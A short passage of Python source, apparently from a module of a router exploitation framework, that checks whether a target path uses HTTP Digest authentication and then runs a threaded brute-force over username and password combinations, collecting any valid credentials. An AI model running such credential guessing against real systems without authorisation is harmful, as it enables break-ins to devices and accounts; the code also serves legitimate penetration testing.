            print_status("Target exposes resource {} protected by Digest Auth".format(self.path), verbose=self.verbosity)
            self.auth_type = "digest"
            return True

        return False

    @mute
    def check_default(self):
        if self.check():
            self.credentials = []

            data = LockedIterator(itertools.product(self.usernames, self.passwords))
            self.run_threads(self.threads, self.target_function, data)

            if self.credentials:
                return self.credentials

        return None
